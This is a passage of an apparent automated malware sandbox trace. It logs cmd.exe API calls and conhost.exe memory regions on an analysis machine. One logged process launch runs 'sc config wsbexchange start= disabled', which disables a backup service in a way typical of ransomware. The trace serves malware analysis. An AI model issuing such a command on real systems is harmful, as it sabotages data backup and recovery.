lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0133.220] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.220] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.220] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0133.220] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0133.220] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0133.220] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0133.220] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0133.220] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0133.220] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0133.220] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0133.220] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0133.220] GetEnvironmentStringsW () returned 0x4f67d90* [0133.221] FreeEnvironmentStringsA (penv="A") returned 1 [0133.221] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.221] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0133.221] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0133.221] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0133.221] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0133.221] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0133.221] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0133.221] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0133.221] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0133.221] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0133.221] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c8f948 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.221] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4c8f948, lpFilePart=0x4c8f940 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4c8f940*="Desktop") returned 0x1d [0133.221] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0133.221] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4c8f6c8 | out: lpFindFileData=0x4c8f6c8) returned 0x4f605c8 [0133.221] FindClose (in: hFindFile=0x4f605c8 | out: hFindFile=0x4f605c8) returned 1 [0133.221] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4c8f6c8 | out: lpFindFileData=0x4c8f6c8) returned 0x4f605c8 [0133.221] FindClose (in: hFindFile=0x4f605c8 | out: hFindFile=0x4f605c8) returned 1 [0133.222] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0133.222] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4c8f6c8 | out: lpFindFileData=0x4c8f6c8) returned 0x4f605c8 [0133.222] FindClose (in: hFindFile=0x4f605c8 | out: hFindFile=0x4f605c8) returned 1 [0133.222] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0133.222] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0133.222] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0133.222] GetEnvironmentStringsW () returned 0x4f67d90* [0133.222] FreeEnvironmentStringsA (penv="=") returned 1 [0133.222] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0133.223] GetConsoleOutputCP () returned 0x1b5 [0133.223] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.223] GetUserDefaultLCID () returned 0x409 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4c8fa78, cchData=128 | out: lpLCData="0") returned 2 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4c8fa78, cchData=128 | out: lpLCData="0") returned 2 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4c8fa78, cchData=128 | out: lpLCData="1") returned 2 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0133.223] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0133.223] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0133.224] GetConsoleTitleW (in: lpConsoleTitle=0x4f6aa10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.224] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0133.224] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0133.225] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0133.225] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0133.225] _wcsicmp (_String1="sc", _String2=")") returned 74 [0133.225] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0133.225] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0133.225] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0133.225] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0133.225] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0133.225] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0133.226] GetConsoleTitleW (in: lpConsoleTitle=0x4c8f760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.226] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0133.226] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0133.226] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0133.226] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0133.226] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0133.226] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0133.226] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0133.226] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0133.226] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0133.226] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0133.226] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0133.226] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0133.226] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0133.226] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0133.226] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0133.226] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0133.226] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0133.226] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0133.226] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0133.226] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0133.226] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0133.227] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0133.227] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0133.227] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0133.227] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0133.227] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0133.227] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0133.227] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0133.227] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0133.227] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0133.227] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0133.227] _wcsicmp (_String1="sc", _String2="START") returned -17 [0133.227] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0133.227] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0133.227] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0133.227] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0133.227] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0133.227] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0133.227] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0133.227] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0133.227] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0133.227] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0133.227] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0133.227] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0133.227] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0133.227] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0133.227] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0133.227] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0133.227] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0133.227] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0133.227] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0133.227] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0133.227] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0133.227] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0133.227] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0133.227] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0133.227] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0133.227] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0133.227] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0133.227] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0133.227] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0133.227] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0133.227] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0133.227] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0133.227] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0133.227] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0133.227] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0133.227] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0133.227] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0133.227] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0133.227] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0133.227] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0133.227] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0133.227] _wcsicmp (_String1="sc", _String2="START") returned -17 [0133.227] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0133.227] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0133.227] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0133.227] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0133.228] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0133.228] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0133.228] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0133.228] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0133.228] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0133.228] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0133.228] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0133.228] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0133.228] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0133.228] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0133.228] SetErrorMode (uMode=0x0) returned 0x0 [0133.228] SetErrorMode (uMode=0x1) returned 0x0 [0133.228] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4f605d0, lpFilePart=0x4c8f26c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4c8f26c*="Desktop") returned 0x1d [0133.228] SetErrorMode (uMode=0x0) returned 0x1 [0133.228] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0133.228] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.235] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.235] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.235] GetConsoleTitleW (in: lpConsoleTitle=0x4c8f4ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.236] InitializeProcThreadAttributeList (in: lpAttributeList=0x4c8f418, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4c8f3fc | out: lpAttributeList=0x4c8f418, lpSize=0x4c8f3fc) returned 1 [0133.236] UpdateProcThreadAttribute (in: lpAttributeList=0x4c8f418, dwFlags=0x0, Attribute=0x60001, lpValue=0x4c8f404, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4c8f418, lpPreviousValue=0x0) returned 1 [0133.236] GetStartupInfoW (in: lpStartupInfo=0x4c8f450 | out: lpStartupInfo=0x4c8f450*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.236] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.237] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0133.237] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0133.237] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0133.237] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.238] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config wsbexchange start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4c8f3a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config wsbexchange start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4c8f3ec | out: lpCommandLine="sc config wsbexchange start= disabled", lpProcessInformation=0x4c8f3ec*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x114, dwThreadId=0xcc0)) returned 1 [0133.243] CloseHandle (hObject=0xa4) returned 1 [0133.244] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.244] GetEnvironmentStringsW () returned 0x4f69ef8* [0133.244] FreeEnvironmentStringsA (penv="=") returned 1 [0133.244] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0133.289] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4c8f384 | out: lpExitCode=0x4c8f384*=0x424) returned 1 [0133.289] CloseHandle (hObject=0xa8) returned 1 [0133.289] _vsnwprintf (in: _Buffer=0x4c8f46c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4c8f38c | out: _Buffer="00000424") returned 8 [0133.289] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0133.289] GetEnvironmentStringsW () returned 0x4f6b340* [0133.289] FreeEnvironmentStringsA (penv="=") returned 1 [0133.289] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.289] GetEnvironmentStringsW () returned 0x4f6b340* [0133.289] FreeEnvironmentStringsA (penv="=") returned 1 [0133.289] DeleteProcThreadAttributeList (in: lpAttributeList=0x4c8f418 | out: lpAttributeList=0x4c8f418) [0133.289] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.289] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0133.290] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.290] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0133.290] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.290] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0133.290] SetConsoleInputExeNameW () returned 0x1 [0133.290] GetConsoleOutputCP () returned 0x1b5 [0133.290] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.290] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.290] exit (_Code=1060) Thread: id = 541 os_tid = 0x714 Process: id = "165" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3d7ae000" os_pid = "0xc6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "164" os_parent_pid = "0xc7c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8658 start_va = 0x7f1dc000 end_va = 0x7f1dcfff entry_point = 0x0 region_type = private name = "private_0x000000007f1dc000" filename = "" Region: id = 8659 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8660 start_va = 0x2c26ed0000 end_va = 0x2c26eeffff entry_point = 0x0 region_type = private name = "private_0x0000002c26ed0000" filename = "" Region: id = 8661 start_va = 0x2c26ef0000 end_va = 0x2c26f03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c26ef0000" filename = "" Region: id = 8662 start_va = 0x2c26f10000 end_va = 0x2c26f4ffff entry_point = 0x0 region_type = private name = "private_0x0000002c26f10000" filename = "" Region: id = 8663 start_va = 0x7df5ff120000 end_va = 0x7ff5ff11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff120000" filename = "" Region: id = 8664 start_va = 0x7ff6c4140000 end_va = 0x7ff6c4162fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4140000" filename = "" Region: id = 8665 start_va = 0x7ff6c416b000 end_va = 0x7ff6c416bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c416b000" filename = "" Region: id = 8666 start_va = 0x7ff6c416e000 end_va = 0x7ff6c416ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c416e000" filename = "" Region: id = 8667 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 8668 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8669 start_va = 0x2c26ed0000 end_va = 0x2c26edffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c26ed0000" filename = "" Region: id = 8670 start_va = 0x2c26ee0000 end_va = 0x2c26ee6fff entry_point = 0x0 region_type = private name = "private_0x0000002c26ee0000" filename = "" Region: id = 8671 start_va = 0x2c26f50000 end_va = 0x2c2700dfff entry_point = 0x2c26f50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8672 start_va = 0x2c27010000 end_va = 0x2c27010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c27010000" filename = "" Region: id = 8673 start_va = 0x2c27020000 end_va = 0x2c2702ffff entry_point = 0x0 region_type = private name = "private_0x0000002c27020000" filename = "" Region: id = 8674 start_va = 0x2c27030000 end_va = 0x2c27036fff entry_point = 0x0 region_type = private name = "private_0x0000002c27030000" filename = "" Region: id = 8675 start_va = 0x2c27040000 end_va = 0x2c2713ffff entry_point = 0x0 region_type = private name = "private_0x0000002c27040000" filename = "" Region: id = 8676 start_va = 0x2c27140000 end_va = 0x2c2717ffff entry_point = 0x0 region_type = private name = "private_0x0000002c27140000" filename = "" Region: id = 8677 start_va = 0x2c27180000 end_va = 0x2c27307fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c27180000" filename = "" Region: id = 8678 start_va = 0x2c27310000 end_va = 0x2c27490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c27310000" filename = "" Region: id = 8679 start_va = 0x2c274a0000 end_va = 0x2c2889ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002c274a0000" filename = "" Region: id = 8680 start_va = 0x2c288a0000 end_va = 0x2c288a0fff entry_point = 0x0 region_type = private name = "private_0x0000002c288a0000" filename = "" Region: id = 8681 start_va = 0x2c288b0000 end_va = 0x2c288b0fff entry_point = 0x0 region_type = private name = "private_0x0000002c288b0000" filename = "" Region: id = 8682 start_va = 0x7ff6c4040000 end_va = 0x7ff6c413ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4040000" filename = "" Region: id = 8683 start_va = 0x7ff6c416c000 end_va = 0x7ff6c416dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c416c000" filename = "" Region: id = 8684 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 8685 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 8686 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = 